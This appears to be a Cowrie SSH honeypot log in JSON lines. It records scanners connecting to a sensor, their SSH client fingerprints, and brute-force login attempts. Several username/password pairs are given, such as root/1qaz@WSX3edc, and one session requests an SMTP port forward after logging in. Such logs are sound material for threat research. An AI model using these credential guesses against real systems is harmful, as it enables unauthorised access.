{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:49:15.968781Z","src_ip":"212.227.235.229","session":"236fc0938844"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:49:17.027219Z","src_ip":"212.227.235.229","session":"236fc0938844"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:17.317544Z","src_ip":"212.227.235.229","session":"236fc0938844"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:17.318341Z","src_ip":"212.227.235.229","session":"ad70ddf8ed38"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":41022,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ddf5ee3895","protocol":"ssh","message":"New connection: 93.123.109.189:41022 (1.2.3.4:22) [session: 98ddf5ee3895]","sensor":"my-vps","timestamp":"2025-08-26T22:49:36.353883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:49:36.354857Z","src_ip":"93.123.109.189","session":"98ddf5ee3895"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T22:49:36.373924Z","src_ip":"93.123.109.189","session":"98ddf5ee3895"}
{"eventid":"cowrie.login.failed","username":"validator","password":"validator","message":"login attempt [validator/validator] failed","sensor":"my-vps","timestamp":"2025-08-26T22:49:36.433556Z","src_ip":"93.123.109.189","session":"98ddf5ee3895"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:49:37.456110Z","src_ip":"93.123.109.189","session":"98ddf5ee3895"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:50:35.763699Z","src_ip":"212.227.235.229","session":"8c711f2b4619"}
{"eventid":"cowrie.session.closed","duration":180.23959159851074,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:50:35.768508Z","src_ip":"212.227.235.229","session":"8c711f2b4619"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51550,"dst_ip":"1.2.3.4","dst_port":22,"session":"76bbec7e2f4a","protocol":"ssh","message":"New connection: 212.227.235.229:51550 (1.2.3.4:22) [session: 76bbec7e2f4a]","sensor":"my-vps","timestamp":"2025-08-26T22:51:07.177959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:51:08.464993Z","src_ip":"212.227.235.229","session":"76bbec7e2f4a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:51:08.466233Z","src_ip":"212.227.235.229","session":"76bbec7e2f4a"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo1","message":"login attempt [odoo/odoo1] failed","sensor":"my-vps","timestamp":"2025-08-26T22:51:12.072309Z","src_ip":"212.227.235.229","session":"76bbec7e2f4a"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:51:15.361062Z","src_ip":"212.227.235.229","session":"76bbec7e2f4a"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.224.98","src_port":46878,"dst_ip":"1.2.3.4","dst_port":22,"session":"940b282e32f8","protocol":"ssh","message":"New connection: 45.78.224.98:46878 (1.2.3.4:22) [session: 940b282e32f8]","sensor":"my-vps","timestamp":"2025-08-26T22:52:17.563273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:52:17.564972Z","src_ip":"45.78.224.98","session":"940b282e32f8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T22:52:17.750875Z","src_ip":"45.78.224.98","session":"940b282e32f8"}
{"eventid":"cowrie.session.closed","duration":"303.2","message":"Connection lost after 303.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:52:34.607039Z","src_ip":"212.227.235.229","session":"20a6c1a28b75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61436,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea865684249c","protocol":"ssh","message":"New connection: 212.227.235.229:61436 (1.2.3.4:22) [session: ea865684249c]","sensor":"my-vps","timestamp":"2025-08-26T22:52:40.276274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:52:40.276964Z","src_ip":"212.227.235.229","session":"ea865684249c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:52:40.402788Z","src_ip":"212.227.235.229","session":"ea865684249c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX3edc","message":"login attempt [root/1qaz@WSX3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:52:40.985670Z","src_ip":"212.227.235.229","session":"ea865684249c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T22:52:41.113892Z","session":"ea865684249c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T22:52:41.240263Z","src_ip":"212.227.235.229","session":"ea865684249c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:52:41.367532Z","src_ip":"212.227.235.229","session":"ea865684249c"}
{"eventid":"cowrie.session.connect","src_ip":"106.12.128.104","src_port":46940,"dst_ip":"1.2.3.4","dst_port":22,"session":"a62451755811","protocol":"ssh","message":"New connection: 106.12.128.104:46940 (1.2.3.4:22) [session: a62451755811]","sensor":"my-vps","timestamp":"2025-08-26T22:52:53.206002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:52:54.086282Z","src_ip":"106.12.128.104","session":"a62451755811"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:52:54.087003Z","src_ip":"106.12.128.104","session":"a62451755811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36116,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b86be8798ed","protocol":"ssh","message":"New connection: 212.227.235.229:36116 (1.2.3.4:22) [session: 3b86be8798ed]","sensor":"my-vps","timestamp":"2025-08-26T22:53:32.815521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:53:33.991748Z","src_ip":"212.227.235.229","session":"3b86be8798ed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:53:33.992568Z","src_ip":"212.227.235.229","session":"3b86be8798ed"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo12","message":"login attempt [odoo/odoo12] failed","sensor":"my-vps","timestamp":"2025-08-26T22:53:40.370450Z","src_ip":"212.227.235.229","session":"3b86be8798ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65360,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb9c37e29e81","protocol":"ssh","message":"New connection: 212.227.235.229:65360 (1.2.3.4:22) [session: cb9c37e29e81]","sensor":"my-vps","timestamp":"2025-08-26T22:53:40.442198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T22:53:41.739717Z","src_ip":"212.227.235.229","session":"cb9c37e29e81"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T22:53:42.674922Z","src_ip":"212.227.235.229","session":"cb9c37e29e81"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:53:45.320783Z","src_ip":"212.227.235.229","session":"3b86be8798ed"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:53:50.043746Z","src_ip":"212.227.235.229","session":"cb9c37e29e81"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62164,"dst_ip":"1.2.3.4","dst_port":22,"session":"704930cf653e","protocol":"ssh","message":"New connection: 217.72.205.35:62164 (1.2.3.4:22) [session: 704930cf653e]","sensor":"my-vps","timestamp":"2025-08-26T22:53:56.820552Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:53:56.821657Z","src_ip":"217.72.205.35","session":"704930cf653e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:54:17.586356Z","src_ip":"45.78.224.98","session":"940b282e32f8"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:54:53.220671Z","src_ip":"106.12.128.104","session":"a62451755811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63804,"dst_ip":"1.2.3.4","dst_port":22,"session":"07da32e8a6c7","protocol":"ssh","message":"New connection: 212.227.235.229:63804 (1.2.3.4:22) [session: 07da32e8a6c7]","sensor":"my-vps","timestamp":"2025-08-26T22:55:20.661734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T22:55:20.662765Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T22:55:20.795480Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.login.failed","username":"user","password":"iforgot","message":"login attempt [user/iforgot] failed","sensor":"my-vps","timestamp":"2025-08-26T22:55:21.412881Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.login.failed","username":"user","password":"hallo","message":"login attempt [user/hallo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:55:22.548426Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.login.failed","username":"user","password":"fatass","message":"login attempt [user/fatass] failed","sensor":"my-vps","timestamp":"2025-08-26T22:55:23.687520Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.login.failed","username":"user","password":"deadhead","message":"login attempt [user/deadhead] failed","sensor":"my-vps","timestamp":"2025-08-26T22:55:24.850768Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc12","message":"login attempt [user/abc12] failed","sensor":"my-vps","timestamp":"2025-08-26T22:55:26.013909Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:55:27.162519Z","src_ip":"212.227.235.229","session":"07da32e8a6c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48540,"dst_ip":"1.2.3.4","dst_port":22,"session":"32aca5a5d89c","protocol":"ssh","message":"New connection: 212.227.235.229:48540 (1.2.3.4:22) [session: 32aca5a5d89c]","sensor":"my-vps","timestamp":"2025-08-26T22:55:56.762135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:55:57.816322Z","src_ip":"212.227.235.229","session":"32aca5a5d89c"}
